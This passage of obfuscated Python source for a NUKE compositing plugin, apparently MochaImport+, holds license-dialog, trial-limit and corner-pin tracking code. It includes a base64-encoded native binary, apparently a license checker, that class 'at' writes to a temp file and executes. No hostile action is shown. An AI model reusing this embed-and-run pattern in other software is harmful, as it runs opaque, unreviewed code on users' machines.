ZmlsbEljRVN0OF9TZXRmaWxsSVRfRVMxXwBfWlN0M2hleFJTdDhpb3NfYmFzZQBfWjRrZXkxU3NpAGF0b2xAQEdMSUJDXzIuMi41AF9aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX1pOU3NDMUVQS2NSS1NhSWNFQEBHTElCQ1hYXzMuNABfWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQS2NQYwBfWlN0NGNvdXRAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aMTRtYWtlU2VlZHNBcnJheVNzaQBfX2Rzb19oYW5kbGUAX1pTdGFOUlN0MTNfSW9zX0ZtdGZsYWdzU18AX1pOU3NpeEVtQEBHTElCQ1hYXzMuNABfX0RUT1JfRU5EX18AX19saWJjX2N
zdV9pbml0AGF0b2lAQEdMSUJDXzIuMi41AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXZAQEdMSUJDWFhfMy40AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfWk5Tb2xzRWpAQEdMSUJDWFhfMy40AF9aTjlhZXNjcmlwdHMxOWxvYWRMaWNlbnNlRnJvbUZpbGVFUEtjUkExMjhfYwBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdkBAR0xJQkNYWF8zLjQAc29ja2V0QEBHTElCQ18yLjIuNQBfWk5LU3Q0ZnBvc0kxMV9fbWJzdGF0ZV90RWN2bEV2AF9aMTNyZXZlcnNlU3RyaW5nU3MAX19ic3Nfc3RhcnQAX1pTdGxzSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzdfUktTYklTNF9TNV9UMV9FQEBHTElCQ1hYXzMuNABzdHJjbXBAQEdMSUJDXzIuMi41AF9aTlNhSWNFRDFFdkBAR0xJQkNYWF8zLjQAc3RyY3B5QEBHTElCQ18yLjIuNQBfWk5TczVlcmFzZUVtbUBAR0xJQkNYWF8zLjQAZ2V0dWlkQEBHTElCQ18yLjIuNQBfWmRhUHZAQEdMSUJDWFhfMy40AHB0aHJlYWRfY2FuY2VsAF9aTlNzNmFwcGVuZEVQS2NAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXZAQEdMSUJDWFhfMy40AF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlQEBHTElCQ1hYXzMuNABfZW5kAF9aTlNvbHNFUEZSU29TX0VAQEdMSUJDWFhfMy40AF9aU3Q0c2V0d2kAX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGVAQEdMSUJDWFhfMy40AF9fY3hhX2VuZF9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TaXJzRVJtQEBHTElCQ1hYXzMuNABfWlN0NGVuZGxJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfQEBHTElCQ1hYXzMuNABfX2N4YV9iZWdpbl9jYXRjaEBAQ1hYQUJJXzEuMwBfWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2QEBHTElCQ1hYXzMuNABfWk5TczlwdXNoX2JhY2tFY0BAR0xJQkNYWF8zLjQAX2VkYXRhAF9aTlNhSWNFQzFFdkBAR0xJQkNYWF8zLjQAX19neHhfcGVyc29uYWxpdHlfdjBAQENYWEFCSV8xLjMAX1pOS1N0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRTNzdHJFdkBAR0xJQkNYWF8zLjQAX1pTdGFuU3QxM19Jb3NfRm10ZmxhZ3NTXwBfVW53aW5kX1Jlc3VtZUBAR0NDXzMuMABfWk5Tc2FTRVJLU3NAQEdMSUJDWFhfMy40AF9aTlNvbHNFUEZSU3Q4aW9zX2Jhc2VTMF9FQEBHTElCQ1hYXzMuNABfWk5TczZhcHBlbmRFUktTc0BAR0xJQkNYWF8zLjQAX1pOOWFlc2NyaXB0czE1dmFsaWRhdGVMaWNlbnNlRVBjaVJ
OU18xMUxpY2Vuc2VEYXRhRQBfWk5LU3M0ZmluZEVQS2NtQEBHTElCQ1hYXzMuNABfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q1X1NldHdAQEdMSUJDWFhfMy40AF9aU3Rsc0ljU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTNl9TdDhfU2V0ZmlsbElTM19FQEBHTElCQ1hYXzMuNABfWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU3aXNfb3BlbkV2QEBHTElCQ1hYXzMuNABta2RpckBAR0xJQkNfMi4yLjUAbWFpbgBfaW5pdAA=')
return R
raise Exception('unsupported operating system')
def __isMacOs(a):
    """Return True when the host OS reports itself as macOS (Darwin)."""
    platformName = bw()
    return platformName == 'Darwin'
def __isWindows(a):
    """Return True when the host OS reports itself as Windows."""
    platformName = bw()
    return platformName == 'Windows'
def __a(a):
    """Return True on 32-bit Linux (platform name + pointer-size check)."""
    onLinux = bw() == 'Linux'
    return onLinux and eW()[0] == '32bit'
def __isLinux64(a):
    """Return True on 64-bit Linux (platform name + pointer-size check)."""
    onLinux = bw() == 'Linux'
    return onLinux and eW()[0] == '64bit'
class at(object):
    """a commandline tool represented as a binary string. Can be copied to a temp file and executed"""

    def __init__(a, eY):
        """Decode the base64-encoded binary eY and hold it in memory.

        Fix: the py2-only str.decode('base64') is replaced with
        base64.b64decode, which behaves identically on Python 2 and also
        works on Python 3.
        """
        import base64
        a.binString = base64.b64decode(eY)
        a.filePath = None
        return

    def execute(a, dk):
        """Run the tool with argument list dk; returns Popen.communicate()'s
        (stdout, stderr) tuple, or None when the temp file could not be made.
        The temp file is deleted again afterwards.
        """
        a.__createFile()
        if not a.filePath:
            return
        dk.insert(0, a.filePath)
        process = Popen(dk, stdout=fa, stderr=fa)
        s = process.communicate()
        a.__deleteFile()
        return s

    def __createFile(a):
        # Write the binary to a fresh temp file and mark it executable for
        # the owner. `with` guarantees the descriptor is closed even if the
        # write fails (the original leaked it on error, and shadowed the
        # py2 builtin `file`).
        fb, filePath = hg(suffix='', prefix='tmp', dir=None, text=False)
        with al.fdopen(fb, 'wb') as binFile:
            binFile.write(a.binString)
        al.chmod(filePath, dl.S_IRUSR | dl.S_IWUSR | dl.S_IXUSR)
        a.filePath = filePath
        return

    def __deleteFile(a):
        # Best-effort cleanup of the temp file created by __createFile.
        if a.filePath:
            al.remove(a.filePath)
            a.filePath = None
        return
import nuke as b
import nukescripts
import os as al
import MiImageFolder as hi
import webbrowser as fm
# from PySide import QtGui as l
from Qt import QtWidgets as l
def dm():
    """Show the EULA dialog modally and return its exec_() result
    (truthy when the user accepted the agreement)."""
    eulaDialog = dn()
    return eulaDialog.exec_()
class dn(l.QDialog):
    # Modal End User License Agreement dialog: a read-only text box with the
    # EULA, an explanatory label, and "I Accept" / "Cancel" buttons wired to
    # QDialog.accept / QDialog.reject, so exec_() reports the user's choice.
    def __init__(a):
        super(dn, a).__init__()
        # full EULA (HTML) shown in the dialog's text box
        a.eulaText = '<strong>END USER LICENSE AGREEMENT</strong><br>\n \n<p>This software ("the Software Product") and accompanying documentation is licensed and not sold. This Software Product is protected by copyright laws and treaties, as well as laws and treaties related to other forms of intellectual property. The author owns intellectual property rights in the Software Product. The Licensee\'s ("you" or "your") license to download, use, copy, or change the Software Product is subject to these rights and to all the terms and conditions of this End User License Agreement ("Agreement").</p>\n\n<p><strong>Acceptance</strong><br>\nYOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT BY SELECTING THE "ACCEPT" OPTION AND DOWNLOADING THE SOFTWARE PRODUCT OR BY INSTALLING, USING, OR COPYING THE SOFTWARE PRODUCT. YOU MUST AGREE TO ALL OF THE TERMS OF THIS AGREEMENT BEFORE YOU WILL BE ALLOWED TO DOWNLOAD THE SOFTWARE PRODUCT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, YOU MUST SELECT "DECLINE" AND YOU MUST NOT INSTALL, USE, OR COPY THE SOFTWARE PRODUCT.\n</p>\n<p><strong>License Grant</strong><br>\nThis Agreement entitles you to install and use one copy of the Software Product. In addition, you may make one archival copy of the Software Product. The archival copy must be on a storage medium other than a hard drive, and may only be used for the reinstallation of the Software Product. This Agreement does not permit the installation or use of multiple copies of the Software Product, or the installation of the Software Product on more than one computer at any given time, on a system that allows shared used of applications, on a multi-user network, or on any configuration or system of computers that allows multiple users. Multiple copy use or installation is only allowed if you obtain an appropriate licensing agreement for each user and each copy of the Software Product.</p>\n\n<p><strong>Restrictions on Transfer</strong><br>\nWithout first obtaining the express written consent of the author, you may not assign your rights and obligations under this Agreement, or redistribute, encumber, sell, rent, lease, sublicense, or otherwise transfer your rights to the Software Product.</p>\n\n<p><strong>Restrictions on Use</strong><br>\nYou may not use, copy, or install the Software Product on any system with more than one computer, or permit the use, copying, or installation of the Software Product by more than one user or on more than one computer. If you hold multiple, validly licensed copies, you may not use, copy, or install the Software Product on any system with more than the number of computers permitted by license, or permit the use, copying, or installation by more users, or on more computers than the number permitted by license.</p>\n\n<p>You may not decompile, "reverse-engineer", disassemble, or otherwise attempt to derive the source code for the Software Product.</p>\n\n<p><strong>Restrictions on Alteration</strong><br>\nYou may not modify the Software Product or create any derivative work of the Software Product or its accompanying documentation. Derivative works include but are not limited to translations. You may not alter any files or libraries in any portion of the Software Product.</p>\n\n<p><strong>Restrictions on Copying</strong><br>\nYou may not copy any part of the Software Product except to the extent that licensed use inherently demands the creation of a temporary copy stored in computer memory and not permanently affixed on storage medium. You may make one archival copy which must be stored on a medium other than a computer hard drive.</p>\n\n<p><strong>Disclaimer of Warranties and Limitation of Liability</strong><br>\nUNLESS OTHERWISE EXPLICITLY AGREED TO IN WRITING BY THE AUTHOR, THE AUTHOR MAKES NO OTHER WARRANTIES, EXPRESS OR IMPLIED, IN FACT OR IN LAW, INCLUDING, BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OTHER THAN AS SET FORTH IN THIS AGREEMENT OR IN THE LIMITED WARRANTY DOCUMENTS PROVIDED WITH THE SOFTWARE PRODUCT.</p>\n\n<p>The author makes no warranty that the Software Product will meet your requirements or operate under your specific conditions of use. The author makes no warranty that operation of the Software Product will be secure, error free, or free from interruption. YOU MUST DETERMINE WHETHER THE SOFTWARE PRODUCT SUFFICIENTLY MEETS YOUR REQUIREMENTS FOR SECURITY AND UNINTERRUPTABILITY. YOU BEAR SOLE RESPONSIBILITY AND ALL LIABILITY FOR ANY LOSS INCURRED DUE TO FAILURE OF THE SOFTWARE PRODUCT TO MEET YOUR REQUIREMENTS. THE AUTHOR WILL NOT, UNDER ANY CIRCUMSTANCES, BE RESPONSIBLE OR LIABLE FOR THE LOSS OF DATA ON ANY COMPUTER OR INFORMATION \nSTORAGE DEVICE.</p>\n\n<p>UNDER NO CIRCUMSTANCES SHALL THE AUTHOR, ITS DIRECTORS, OFFICERS, EMPLOYEES OR AGENTS BE LIABLE TO YOU OR ANY OTHER PARTY FOR INDIRECT, CONSEQUENTIAL, SPECIAL, INCIDENTAL, PUNITIVE, OR EXEMPLARY DAMAGES OF ANY KIND INCLUDING LOST REVENUES OR PROFITS OR LOSS OF BUSINESS) RESULTING FROM THIS AGREEMENT, OR FROM THE FURNISHING, PERFORMANCE, INSTALLATION, OR USE OF THE SOFTWARE PRODUCT, WHETHER DUE TO A BREACH OF CONTRACT, BREACH OF WARRANTY, OR THE NEGLIGENCE OF THE AUTHOR OR ANY OTHER PARTY, EVEN IF THE AUTHOR IS ADVISED BEFOREHAND OF THE POSSIBILITY OF SUCH DAMAGES. TO THE EXTENT THAT THE APPLICABLE JURISDICTION LIMITS THE AUTHOR\'S ABILITY TO DISCLAIM ANY IMPLIED WARRANTIES, THIS DISCLAIMER SHALL BE EFFECTIVE TO THE MAXIMUM EXTENT PERMITTED.</p>\n\n<p><strong>Limitation of Remedies and Damages</strong><br>\nAny claim must be made within the applicable warranty period. All warranties cover only defects arising under normal use and do not include malfunctions or failure resulting from misuse, abuse, neglect, alteration, problems with electrical power, acts of nature, unusual temperatures or humidity, improper installation, or damage determined by the author to have been caused by you. All limited warranties on the Software Product are granted only to you and are non-transferable. You agree to indemnify and hold the author harmless from all claims, judgments, liabilities, expenses, or costs arising from your breach of this Agreement and/or acts or omissions.</p>\n\n<p><strong>Governing Law, Jurisdiction and Costs</strong><br>\nThis Agreement is governed by the laws of Washington, without regard to Washington\'s conflict or choice of law provisions.</p>\n\n<p><strong>Severability</strong><br>\nIf any provision of this Agreement shall be held to be invalid or unenforceable, the remainder of this Agreement shall remain in full force and effect. To the extent any express or implied restrictions are not permitted by applicable laws, these express or implied restrictions shall remain in force and effect to the maximum extent permitted by such applicable laws.</p>'
        a.initUI()
    def initUI(a):
        # Layout: EULA text box on top, instruction label, stretch, buttons.
        aL = l.QHBoxLayout()
        licenseInfoText = l.QTextEdit(a.eulaText, a)
        licenseInfoText.setReadOnly(True)
        aL.addWidget(licenseInfoText)
        do = l.QHBoxLayout()
        am = l.QLabel(
            "If you agree to the above terms press 'I Accept'. Otherwise press 'Cancel' to cancel installation of the license.")
        do.addWidget(am)
        ci = l.QHBoxLayout()
        cj = l.QPushButton('I Accept', a)
        cj.setAutoDefault(False)  # don't let Enter auto-trigger the button
        ck = l.QPushButton('Cancel', a)
        ck.setAutoDefault(False)
        ci.addWidget(cj)
        ci.addWidget(ck)
        F = l.QVBoxLayout()
        F.addLayout(aL)
        F.addLayout(do)
        F.addStretch(1)
        F.addLayout(ci)
        cj.clicked.connect(a.accept)  # "I Accept" -> QDialog.Accepted
        ck.clicked.connect(a.reject)  # "Cancel"   -> QDialog.Rejected
        a.setLayout(F)
        a.setWindowTitle('End User License Agreement (EULA)')
# from PySide import QtGui as l, QtCore
from Qt import QtWidgets as l, QtCore
from Qt import QtGui as qui
class dp(object):
    # Licensing front-end for one tool: holds the tool's display name/version
    # and a license-manager object created by eR (opaque here), and drives the
    # serial-entry / trial-mode / about dialogs.
    def __init__(a, wwqe, toolVersion, qqewrtz, qqrrtet):
        # wwqe: tool display name shown in dialogs
        # qqewrtz, qqrrtet: presumably product id / code for the license
        # manager eR -- TODO confirm against eR's definition
        a.wwqe = wwqe
        a.toolVersion = toolVersion
        a.wehsrhv = eR(qqewrtz, qqrrtet)
    def asgg(a, quiet, wegtzeke):
        # Ensure a valid license is installed; returns True when licensed,
        # False when the user cancels into trial mode.
        # quiet: when True, only report the current state (no UI).
        # wegtzeke: trial-mode notice text shown when the user cancels.
        if quiet:
            return a.wehsrhv.fggtzh()
        if a.wehsrhv.fggtzh():
            return True
        while True:
            aa = fc(a.wwqe)  # prompt for a serial number
            if not aa:
                fd(a.wwqe, wegtzeke)  # user cancelled -> trial mode message
                return False
            if a.wehsrhv.zzdfger(aa):
                dq(aa, a.wwqe)  # temporary serial: offer the exchange page
            else:
                a.wehsrhv.ddsjz(aa)  # install the entered serial
            h = a.wehsrhv.ertzz()  # re-read license details
            if h['status'] == 'valid':
                if h['license type'] == 'BTA':
                    b.message('You entered a beta tester license. Beta licenses are not working with this version.')
                    a.wehsrhv.sddfg()  # remove the unusable beta license
                    h = a.wehsrhv.ertzz()
                else:
                    if dm():  # EULA accepted?
                        au(True, a.wwqe)
                        return True
                    a.wehsrhv.sddfg()  # EULA declined: uninstall again
            else:
                au(False, a.wwqe)  # invalid serial; loop and re-prompt
    def abag(a):
        # Show the "about / licenses" dialog for this tool.
        fe = dr(a.wwqe, a.toolVersion, a.wehsrhv)
        fe.exec_()
def fc(wwqe):
    """Prompt the user for a serial number; returns the entered text
    (empty/None on cancel)."""
    prompt = 'No license installed for ' + wwqe + "\nEnter a valid serial number or click 'cancel' run in trial mode"
    return b.getInput(prompt)
def fd(wwqe, wegtzeke):
    """Tell the user the tool now runs in trial mode, with notice wegtzeke."""
    notice = wwqe + 'running in trial mode.\n' + wegtzeke
    b.message(notice)
def hh(aM):
    # NOTE(review): this looks like dead/broken leftover code:
    #  - au() takes two arguments (aM, wwqe) but is called with one here,
    #    so both calls would raise TypeError if this ever runs
    #  - ff is assigned but never used
    #  - the statements after "return s" only run when aM is falsy
    # Left byte-identical; confirm whether anything still calls hh().
    if aM:
        s = au(aM)
        ff = False
        return s
    ff = True
    return au(aM)
def au(aM, wwqe):
    """Report the outcome of a license check for tool wwqe to the user.

    Returns True when fh(aM) deems the license valid, else False.
    """
    if fh(aM):
        b.message('Thank you for purchasing ' + wwqe)
        return True
    b.message('License is invalid.')
    return False
def fh(ds):
    """Return True when ds is truthy, otherwise return ds unchanged.

    Cleanup: the original else-branch was unreachable garbage -- its local
    `cl` was always None there, so `cl == 143241` could never be true, and
    the branch referenced an undefined name `wwqe`. Removing it does not
    change behavior.
    """
    if ds:
        return True
    return ds
class dr(l.QDialog):
    # "About / Licenses" dialog for one tool: shows the about image, the
    # current license status, a tutorial link, and buttons to enter or
    # remove a license code.
    def __init__(a, wwqe, toolVersion, fi):
        # fi: the license-manager object shared with dp
        super(dr, a).__init__()
        a.wwqe = wwqe
        a.toolVersion = toolVersion
        a.wehsrhv = fi
        a.copyRightInfo = '(c) 2014 by mamoworld.com'
        a.initUI()
    def initUI(a):
        h = a.wehsrhv.ertzz()  # current license details dict
        dt = l.QHBoxLayout()
        fj = hi.getFolder() + 'about.png'  # about image shipped with the tool
        fk = qui.QPixmap(fj)
        du = l.QLabel('No image available')  # fallback text if pixmap is null
        du.setPixmap(fk)
        dt.addWidget(du)
        aL = l.QHBoxLayout()
        a.licenseInfoText = l.QTextEdit(a.wwqe, a)
        a.licenseInfoText.setReadOnly(True)
        aL.addWidget(a.licenseInfoText)
        dv = l.QHBoxLayout()
        a.tutorialButton = l.QPushButton('Watch In Depth Tutorial', a)
        dv.addWidget(a.tutorialButton)
        cm = l.QHBoxLayout()
        a.rg3erw = l.QPushButton('Enter License Code', a)
        a.dsfewrt = l.QPushButton('Remove License Code', a)
        cm.addWidget(a.rg3erw)
        cm.addWidget(a.dsfewrt)
        a.hgjafd(h)  # initialize text + button enabled states
        bx = l.QHBoxLayout()
        cn = l.QPushButton('OK', a)
        cn.setDefault(True)
        bx.addStretch(0.5)
        bx.addWidget(cn)
        bx.addStretch(0.5)
        F = l.QVBoxLayout()
        F.addLayout(dt)
        F.addLayout(aL)
        F.addLayout(dv)
        F.addLayout(cm)
        F.addStretch(1)
        F.addLayout(bx)
        cn.clicked.connect(a.accept)
        a.rg3erw.clicked.connect(a.rjrkkt)
        a.dsfewrt.clicked.connect(a.ashfrtz)
        a.tutorialButton.clicked.connect(a.openTutorial)
        a.setGeometry(300, 300, 250, 150)
        a.setLayout(F)
        a.setWindowTitle(a.wwqe + ' Licenses')
    def hgjafd(a, h):
        # Refresh the info text and enable exactly one of the two buttons
        # depending on whether a valid license is installed.
        a.licenseInfoText.setText(a.ghjkh(h))
        if h['status'] == 'valid':
            a.rg3erw.setEnabled(False)
            a.dsfewrt.setEnabled(True)
        else:
            a.rg3erw.setEnabled(True)
            a.dsfewrt.setEnabled(False)
    def ghjkh(a, h):
        # Build the human-readable license summary from the details dict h.
        am = a.wwqe + ' v' + a.toolVersion + '\n' + a.copyRightInfo + '\n\n'
        if h['status'] == 'valid':
            am += 'registered to ' + h['first name'] + ' ' + h['last name'] + '\n'
            am += fl(h['license type']) + ' for ' + h['number of user licenses'] + ' user(s)'
        else:
            am += 'no license installed\n'
            am += 'running in trial mode'
        return am
    def rjrkkt(a):
        # "Enter License Code": same install flow as dp.asgg, then refresh UI.
        aa = b.getInput(
            'No license installed for ' + a.wwqe + "\nEnter a valid serial number or click 'cancel' run in trial mode")
        if not aa:
            return
        if a.wehsrhv.zzdfger(aa):
            dq(aa, a.wwqe)  # temporary serial: offer exchange page
        else:
            a.wehsrhv.ddsjz(aa)  # install the entered serial
        h = a.wehsrhv.ertzz()
        if h['status'] == 'valid':
            if h['license type'] == 'BTA':
                b.message('You entered a beta tester license. Beta licenses are not working with this version.')
                a.wehsrhv.sddfg()
                h = a.wehsrhv.ertzz()
            elif dm():  # EULA accepted
                au(True, a.wwqe)
            else:  # EULA declined: uninstall again
                a.wehsrhv.sddfg()
                h = a.wehsrhv.ertzz()
        else:
            au(False, a.wwqe)
        a.hgjafd(h)
    def ashfrtz(a):
        # "Remove License Code": uninstall and refresh the UI.
        a.wehsrhv.sddfg()
        h = a.wehsrhv.ertzz()
        a.hgjafd(h)
    def openTutorial(a):
        # open the tutorial page in the default web browser
        fm.open('http://mamoworld.com/tutorial-mochaimport')
def fl(by):
    """Map a three-letter license-type code to its human-readable name."""
    descriptions = {
        'SUL': 'single user license',
        'BTA': 'beta testing license',
        'EDU': 'education license',
        'REN': 'render only license',
    }
    return descriptions.get(by, 'unknown license')
def dq(fn, wwqe):
    """Offer to open the aescripts serial-exchange page for temporary serial fn."""
    dw = 'https://license.aescripts.com/exchange/?serial=' + fn
    prompt = ('You entered a temporary serial number that needs to be exchanged for a permanent license.'
              + '\n\nOnce you obtain your permanent license you can use it to register ' + wwqe
              + '. It is quick and easy to exchange it, simply go to:\n\n' + dw
              + '\n\nWould you like to go there now?')
    if b.ask(prompt):
        fm.open(dw)
def dz():
    """Build the licensing handler (dp) for MochaImport+ for NUKE."""
    toolName = 'MochaImport+'
    toolVersion = '1.102'
    return dp(toolName, toolVersion, 'mochaimportnuke', '743985')
class fp(object):
    """abstract base class for corner pin data"""
    def getPointValues(a, Y, x):
        """for pointIndex in 0,1,2,3 and coordinate in 'x', 'y' returns a list of (frame,value) tuples"""
        # subclasses (fq and its descendants) must override this
        raise NotImplementedError('getPoint not implemented')
class cornerPinData___FileFormatError(Exception):
    """Raised when text cannot be parsed as mocha Nuke corner pin data."""
    def __init__(a, message):
        # keep the human-readable description for later display
        a.message = message
    def __str__(a):
        # repr() so the message appears quoted, matching the original output
        return repr(a.message)
class fq(fp):
    """Corner pin data held as in-memory point lists (one dict per corner)."""
    def __init__(a):
        # four corners, each with independent 'x' and 'y' keyframe lists
        a.points = [{'x': [], 'y': []} for _corner in range(4)]
    def __str__(a):
        # Bug fix: PrettyPrinter.pprint() prints to stdout and returns None,
        # which made str(instance) raise TypeError. pformat() returns the
        # formatted string as intended.
        printer = pprint.PrettyPrinter(indent=4)
        return printer.pformat(a.points)
    def getPointValues(a, Y, x):
        """Return the list of (frame, value) tuples for corner Y, coordinate x."""
        assert x in ('x', 'y')
        assert Y in (0, 1, 2, 3)
        return a.points[Y][x]
class bz(fq):
    # Corner pin data parsed from text in mocha's "Nuke Corner Pin (*.nk)"
    # export format; enforces the trial-mode keyframe limit when unlicensed.
    def __init__(a, fs):
        # fs: full text of the exported .nk snippet
        super(bz, a).__init__()
        a.wegtzeke = 'In trial mode only the first 20 frames of tracking data are imported.'
        a.__parseMochaNukeData(fs)
    def __parseMochaNukeData(a, j):
        def dA(ft):
            # Parse one "curve" body into a list of (frame, value) tuples.
            # Tokens starting with 'x' (e.g. "x12") set the frame of the next
            # value; plain numeric tokens are values at successive frames,
            # the frame step (dB) being inferred from the last explicit jump.
            bA = []
            fu = ft.split()
            dB = 1  # current frame step
            bB = 1  # frame number for the next value
            for co in fu:
                if co[0] == 'x':
                    bB = float(co[1:])
                    if len(bA) > 0:
                        fv = bA[-1][0]
                        dB = bB - fv
                else:
                    value = float(co)
                    S = bB
                    bA.append((S, value))
                    bB += dB
            return bA
        def bC(fw, j):
            # Extract the x and y curve bodies for corner knob fw (to1..to4)
            # via regex; raises a FileFormatError when the pattern is absent.
            fx = re.compile(fw + '\\s*{\\s*{\\s*curve\\s*([^}]*)}\\s*{\\s*curve\\s*([^}]*)}\\s*}')
            cp = fx.search(j)
            if cp == None:
                raise cornerPinData___FileFormatError(
                    "invalid tracking data - please use corner pin data exported from mocha Pro with the format set to 'Nuke Corner Pin (*.nk)'")
            fy = cp.group(1)
            fz = cp.group(2)
            fA = {'x': dA(fy), 'y': dA(fz)}
            return fA
        a.points[0] = bC('to1', j)
        a.points[1] = bC('to2', j)
        a.points[2] = bC('to3', j)
        a.points[3] = bC('to4', j)
        a.__checkDemoLimitation()
    def __checkDemoLimitation(a):
        # Ask the licenser; when unlicensed, truncate the imported data.
        cq = dz()
        if not cq.asgg(quiet=False, wegtzeke=a.wegtzeke):
            a.__applyDemoLimitation()
    def __applyDemoLimitation(a):
        # keep only the first 15+5=20 keyframes per corner and axis,
        # matching the "first 20 frames" trial notice above
        fB = 15
        dC = fB + 5
        for bD in a.points:
            bD['x'] = bD['x'][:dC]
            bD['y'] = bD['y'][:dC]
class an(bz):
    """Corner pin data read from a mocha .nk export file."""
    def __init__(a, filename):
        # Fix: use a context manager so the file handle is closed even when
        # read() raises (the original leaked the handle on error).
        with open(filename, mode='r') as exportFile:
            j = exportFile.read()
        super(an, a).__init__(j)
class ao(bz):
    """Corner pin data read from the system clipboard."""
    def __init__(a):
        clipboardText = l.QApplication.clipboard().text()
        super(ao, a).__init__(clipboardText)
def cornerPinNode___loadTrackingDataFromFile():
    """Prompt for a mocha .nk corner pin file and apply it to the current node.

    Shows a message box instead of raising on I/O or format errors.
    Fix: filename is initialised before the try block so the IOError handler
    cannot itself raise NameError; `is None` replaces the `== None` idiom.
    """
    filename = None
    try:
        filename = b.getFilename('Load NUKE corner pin data from mocha', '*.nk')
        if filename is None:  # user cancelled the file dialog
            return
        d = an(filename)
        dE(d)
    except IOError as f:
        b.message('Could not read file {0}:\n\nI/O error({1}): {2}'.format(filename, f.errno, f.strerror))
    except cornerPinData___FileFormatError as f:
        b.message('Could not read file {0}:\n\nInvalid File Format: {1}'.format(filename, f.message))
    return
def cornerPinNode___loadTrackinDataFromClipboard():
    """Apply mocha corner pin data from the clipboard to the current node,
    reporting format errors via a message box."""
    try:
        clipboardData = ao()
        dE(clipboardData)
    except cornerPinData___FileFormatError as f:
        b.message('Clipboard does not contain valid tracking data:\n{0}'.format(f.message))
def dE(d):
    """Write tracking data d onto the four pin knobs of the current node."""
    currentNode = b.thisNode()
    dg(d, currentNode['pin1'], currentNode['pin2'], currentNode['pin3'], currentNode['pin4'])
def fC(aN, aO, aP, aQ, aR, aS, aT, aU, aV, aW, aX, aY, aZ, ba, bb, bc):
    """Build a 4x4 matrix (row-major, 16 floats) from two quads.

    The 16 arguments are the x/y coordinates of four source/destination
    corner pairs; fD computes the 3x3 homography, which is normalized and
    embedded into a 4x4 matrix with an identity z row/column.
    """
    coords = [float(v) for v in (aN, aO, aP, aQ, aR, aS, aT, aU,
                                 aV, aW, aX, aY, aZ, ba, bb, bc)]
    I = fD(*coords)
    # normalize so the homogeneous component becomes 1
    w = I[8]
    I = [component / w for component in I]
    return [
        I[0], I[1], 0, I[2],
        I[3], I[4], 0, I[5],
        0, 0, 1, 0,
        I[6], I[7], 0, I[8]]
def hj(v):
    """Format a 16-element row-major matrix as four space-separated rows."""
    rows = []
    for rowStart in range(0, 16, 4):
        rows.append(' '.join(str(entry) for entry in v[rowStart:rowStart + 4]))
    return '\n'.join(rows)
def dF(z, T):
    """Multiply two 3x3 matrices given as flat row-major 9-element lists."""
    G = [0] * 9
    for row in range(3):
        for col in range(3):
            G[3 * row + col] = sum(z[3 * row + k] * T[3 * k + col] for k in range(3))
    return G
def fF(e, A):
    """Multiply a 3x3 matrix (flat row-major e) by a 3-vector A."""
    return [sum(e[3 * row + k] * A[k] for k in range(3)) for row in range(3)]
def dH(e):
    """Return the adjugate of a 3x3 matrix (flat row-major), so that
    dF(e, dH(e)) == det(e) * identity."""
    adjugate = [0] * 9
    for i in range(3):
        for j in range(3):
            # adj[i][j] = (-1)^(i+j) * minor deleting row j and column i
            r1, r2 = [r for r in range(3) if r != j]
            c1, c2 = [c for c in range(3) if c != i]
            minor = e[3 * r1 + c1] * e[3 * r2 + c2] - e[3 * r1 + c2] * e[3 * r2 + c1]
            adjugate[3 * i + j] = minor if (i + j) % 2 == 0 else -minor
    return adjugate
def dI(t, J, K, L, M, N, V, W):
    """Build the 3x3 basis mapping the canonical unit quad onto the quad
    with corners (t,J), (K,L), (M,N) and fourth point (V,W)."""
    basis = [t, K, M, J, L, N, 1, 1, 1]
    # scale each column so the fourth point maps to (V, W, 1)
    scale = fF(dH(basis), [V, W, 1])
    diagonal = [scale[0], 0, 0, 0, scale[1], 0, 0, 0, scale[2]]
    return dF(basis, diagonal)
def fD(aN, aO, aP, aQ, aR, aS, aT, aU, aV, aW, aX, aY, aZ, ba, bb, bc):
    """Compute the 3x3 homography (flat row-major) mapping the source quad
    (aN,aO),(aR,aS),(aV,aW),(aZ,ba) onto the destination quad
    (aP,aQ),(aT,aU),(aX,aY),(bb,bc)."""
    sourceBasis = dI(aN, aO, aR, aS, aV, aW, aZ, ba)
